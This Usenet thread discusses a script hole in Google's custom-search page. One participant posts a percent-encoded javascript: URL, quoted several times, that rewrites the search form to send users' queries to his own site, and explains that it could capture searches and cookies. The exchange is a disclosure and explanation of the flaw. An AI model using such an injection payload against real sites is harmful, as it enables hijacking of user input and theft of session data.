Hello NS
N> The commentators on the ITV website are spitting blood .
What an odd search engine they've got on that page.
Refers query direct to google.com, but replaces the google graphic
with the ITV one.
I wonder if Google know?
And I wanted to search /their/ site, not the whole sodding internet.
--
Simon Avery, Devon, UK
Opinions expressed are mine, not my employers.
Working for the Mare & Foal Sanctuary;
http://www.mareandfoal.org/
Personal: http://www.digdilem.org/
>XC: #UK.NET.WEB.AUTHORING #ZZ_OUTBOUND
>NS <webm...@newsservers.co.uk.INVALID> wrote:
>
>Hello NS
>
> N> The commentators on the ITV website are spitting blood .
>
>What an odd search engine they've got on that page.
>
>Refers query direct to google.com, but replaces the google graphic
>with the ITV one.
Google have a feature, that let you put any image at the top of
google:
Here's Google with my shepherds image...
<URL:
http://www.google.com/custom?cof=L:http://jibbering.com/imgs/shepherds.jpg
>
and here's a hijacked Google search where it's routed to my site...
I'd suggest even the first is a bug, the second is definately a script
hole - the script hole isn't particularly serious as long as you don't
give google any private information...
Jim.
> Here's Google with my shepherds image...
>
> <URL:
> http://www.google.com/custom?cof=L:http://jibbering.com/imgs/shepherds.jpg
>
>
> and here's a hijacked Google search where it's routed to my site...
>
> <URL:
> http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%77%69
> %6e%64%6f%77%2e%6f%6e%6c%6f%61%64%3d%66%75%6e%63%74%69%6f%6e%28%29%7b%64%6
> f%63%75%6d%65%6e%74%2e%66%6f%72%6d%73%5b%30%5d%2e%61%63%74%69%6f%6e%3d%27%
> 68%74%74%70%3a%2f%2f%6a%69%62%62%65%72%69%6e%67%2e%63%6f%6d%2f%73%2e%31%27
> %7d
>
>
> I'd suggest even the first is a bug, the second is definately a script
> hole - the script hole isn't particularly serious as long as you don't
> give google any private information...
What do you mean? I couldn't see what exactly it was that I'm supposed
to be seeing in the second example.
Daniele
--
Apple Juice. Macintosh service, support and sales, Cardiff
www.apple-juice.co.uk 029 2041 0050
Are you good at web design/development & Mac support? Would
you like to earn a living doing it in Cardiff? Get in touch.
>Jim Ley <j...@jibbering.com> wrote:
>>
>> I'd suggest even the first is a bug, the second is definately a script
>> hole - the script hole isn't particularly serious as long as you don't
>> give google any private information...
>
>What do you mean? I couldn't see what exactly it was that I'm supposed
>to be seeing in the second example.
Assuming you're using IE or Mozilla on windows and probably other
systems (they need to support javascript: pseudo protocol for images )
and have scripting enabled it, the second example will send all
searches to a page on jibbering.com
Jim.
> Jim Ley <j...@jibbering.com> wrote:
>
> > here's a hijacked Google search where it's routed to my site...
> >
> > <URL:
> > http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%77%69
> > %6e%64%6f%77%2e%6f%6e%6c%6f%61%64%3d%66%75%6e%63%74%69%6f%6e%28%29%7b%64%6
> > f%63%75%6d%65%6e%74%2e%66%6f%72%6d%73%5b%30%5d%2e%61%63%74%69%6f%6e%3d%27%
> > 68%74%74%70%3a%2f%2f%6a%69%62%62%65%72%69%6e%67%2e%63%6f%6d%2f%73%2e%31%27
> > %7d
[...]
> > definately a script hole - the script hole isn't particularly
> > serious as long as you don't give google any private information...
>
> What do you mean? I couldn't see what exactly it was that I'm supposed
> to be seeing in the second example.
Go to google.com and search for "apple-juice.co.uk". Then try doing it
via Jim's link.
Peter
> > > here's a hijacked Google search where it's routed to my site...
> > >
> > > <URL:
> > > http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%77%69
> > > %6e%64%6f%77%2e%6f%6e%6c%6f%61%64%3d%66%75%6e%63%74%69%6f%6e%28%29%7b%64%6
> > > f%63%75%6d%65%6e%74%2e%66%6f%72%6d%73%5b%30%5d%2e%61%63%74%69%6f%6e%3d%27%
> > > 68%74%74%70%3a%2f%2f%6a%69%62%62%65%72%69%6e%67%2e%63%6f%6d%2f%73%2e%31%27
> > > %7d
>
> [...]
>
> > > definately a script hole - the script hole isn't particularly
> > > serious as long as you don't give google any private information...
> >
> > What do you mean? I couldn't see what exactly it was that I'm supposed
> > to be seeing in the second example.
>
> Go to google.com and search for "apple-juice.co.uk". Then try doing it
> via Jim's link.
Right - I get a slightly different set of results, presumably because
the search from Jim's link included some of search preferences in it.
But I don't understand why it's a problem, or could be.
> Assuming you're using IE or Mozilla on windows and probably other
> systems (they need to support javascript: pseudo protocol for images )
> and have scripting enabled it, the second example will send all
> searches to a page on jibbering.com
You mean, it will tell you what I'm searching for, without my noticing
it?
>Peter Robinson <pmrob...@mail.com> wrote:
>
>Right - I get a slightly different set of results, presumably because
>the search from Jim's link included some of search preferences in it.
>
>But I don't understand why it's a problem, or could be.
Like many security problems it doesn't effect all browsers, so
obviously doesn't work with yours, on win32 IE it redirects the search
to a page on my website. As I can execute script in the context of
google, I can get any information you tell google, your searches, your
cookies.
Jim.